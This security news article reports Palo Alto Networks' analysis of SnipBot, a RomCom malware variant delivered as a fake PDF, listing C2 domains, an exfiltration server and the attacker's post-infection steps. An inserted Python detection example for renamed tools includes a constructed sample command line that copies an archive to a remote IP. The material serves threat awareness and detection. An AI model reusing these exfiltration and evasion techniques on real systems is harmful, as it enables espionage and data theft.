Hackers Weaponizing PDF Files To Deliver New SnipBot Malware


Hackers are increasingly weaponizing PDF files to deliver malware and carry out cyberattacks. 

They exploit the ubiquity and perceived trustworthiness of PDFs to trick victims into opening malicious files that can contain malicious links, embedded code, or exploits for vulnerabilities that allow remote code execution.


Security experts at Palo Alto Networks identified recently that hackers have been actively weaponizing PDF files to deliver new SnipBot malware.

Hackers Weaponizing PDF Files

SnipBot is a newly discovered variant of the “RomCom” malware family that was identified in April 2024 by Palo Alto Networks’ Advanced WildFire sandbox.

This sophisticated threat is designated “RomCom 5.0,” and it combines features from:

  • RomCom 3.0 
  • PEAPOD (RomCom 4.0) 

SnipBot employs a multi-stage infection process that begins with a signed executable disguised as a PDF.

The initial stage uses anti-sandbox techniques such as checking process names and registry entries.

To evade detection, the malware relies on window message-based control-flow obfuscation and encrypted strings.

SnipBot execution flow (Source – Palo Alto Networks)

Besides this, it downloads additional payloads, such as a DLL that injects code into Explorer.exe through COM hijacking.

The core functionality of SnipBot lives in a backdoor (single.dll) that creates a mutex named “SnipMutex” and enables threat actors to execute commands, upload and download files, and deploy extra modules.

Initially, the malware communicates with command and control (C2) servers using domains such as xeontime[.]com and drvmcprotect[.]com.

Earlier versions of the malware used different tactics, such as fake Adobe font installers, and C2 domains like ilogicflow[.]com and webtimeapi[.]com.

Fake Adobe website (Source – Palo Alto Networks)

The evolution of SnipBot illustrates the ongoing sophistication of cyber threats.

Its evasion techniques, payload delivery methods, and post-infection capabilities are used to compromise systems and exfiltrate sensitive data.

Analysis of SnipBot’s post-infection activity, tracked via Cortex XDR telemetry, revealed a sophisticated attack sequence lasting about four hours on April 4. 

The attacker, using the command-line functionality of SnipBot’s main module (single.dll), first conducted network reconnaissance to identify the domain controller. 

They then attempted to exfiltrate files from the victim’s documents, downloads, and OneDrive folders to a server at 91.92.250[.]104. 

The attacker employed tools like AD Explorer and WinRAR (renamed fsutil.exe) for discovery and file compression, and the PuTTY Secure Copy client (renamed dsutil.exe) for data transfer.
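The renaming trick above (WinRAR running as fsutil.exe, the PuTTY Secure Copy client as dsutil.exe) leaves a detectable mismatch between a process image's on-disk name and the OriginalFileName compiled into its version resource. The following detection logic is an added example, not code from Palo Alto Networks or from the article; the event records are constructed to resemble Sysmon Event ID 1 fields and are not real telemetry from the incident, and the watch list of tool names is an assumption.

```python
# Added example: flag process-creation events where the on-disk file name differs from
# the OriginalFileName recorded in the binary's version resource.
# SAMPLE_EVENTS are constructed records shaped like Sysmon Event ID 1; not real telemetry.
import ntpath

# Assumed watch list: legitimate tools worth a second look when they run under another name.
WATCHED_ORIGINALS = {"winrar.exe", "rar.exe", "pscp.exe", "putty.exe", "adexplorer.exe"}

SAMPLE_EVENTS = [
    {"Image": r"C:\Users\victim\AppData\Local\Temp\fsutil.exe",
     "OriginalFileName": "WinRAR.exe", "CommandLine": "fsutil.exe a out.rar Documents"},
    {"Image": r"C:\Users\victim\AppData\Local\Temp\dsutil.exe",
     "OriginalFileName": "pscp.exe", "CommandLine": "dsutil.exe out.rar 192.0.2.10:/tmp/"},
    {"Image": r"C:\Windows\System32\fsutil.exe",          # the real fsutil, benign
     "OriginalFileName": "fsutil.exe", "CommandLine": "fsutil.exe fsinfo drives"},
    {"Image": r"C:\Program Files\WinRAR\WinRAR.exe",      # WinRAR under its own name, benign
     "OriginalFileName": "WinRAR.exe", "CommandLine": "WinRAR.exe"},
]


def is_masqueraded(event: dict) -> bool:
    """True when the executable's on-disk name differs from its compiled-in OriginalFileName."""
    on_disk = ntpath.basename(event["Image"]).lower()   # ntpath handles backslashes on any OS
    original = event.get("OriginalFileName", "").lower()
    # A missing version resource is inconclusive, not evidence of renaming; do not flag it.
    if not original:
        return False
    return on_disk != original


def find_renamed_tools(events: list) -> list:
    """Return the masqueraded events whose real binary is on the watch list."""
    hits = []
    for ev in events:
        if is_masqueraded(ev) and ev["OriginalFileName"].lower() in WATCHED_ORIGINALS:
            hits.append({"disguised_as": ntpath.basename(ev["Image"]),
                         "actually": ev["OriginalFileName"],
                         "command_line": ev["CommandLine"]})
    return hits


if __name__ == "__main__":
    for hit in find_renamed_tools(SAMPLE_EVENTS):
        print(f"{hit['disguised_as']} is really {hit['actually']}: {hit['command_line']}")
```

Running the block over the constructed sample reports only the two renamed tools; the genuine fsutil.exe and the openly named WinRAR.exe are left alone.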

The targeted file types included standard system files as well as unusual health-related formats (ZBF, DCM).

Even though there were problems, evidenced by attempts to kill the PuTTY process, the attacker continued to the end and installed “config-pdf.dll,” which had been downloaded from xeontime[.]com, and sought commands at cethernet[.]com.

The attack concluded with an attempt to snapshot the local Active Directory database and archive files from c:essential. 

This comprehensive approach, combining custom malware (SnipBot), living-off-the-land techniques, and targeted data exfiltration, suggests a possible shift from financial motives to espionage, as noted by CERT-UA’s findings on the threat actor.
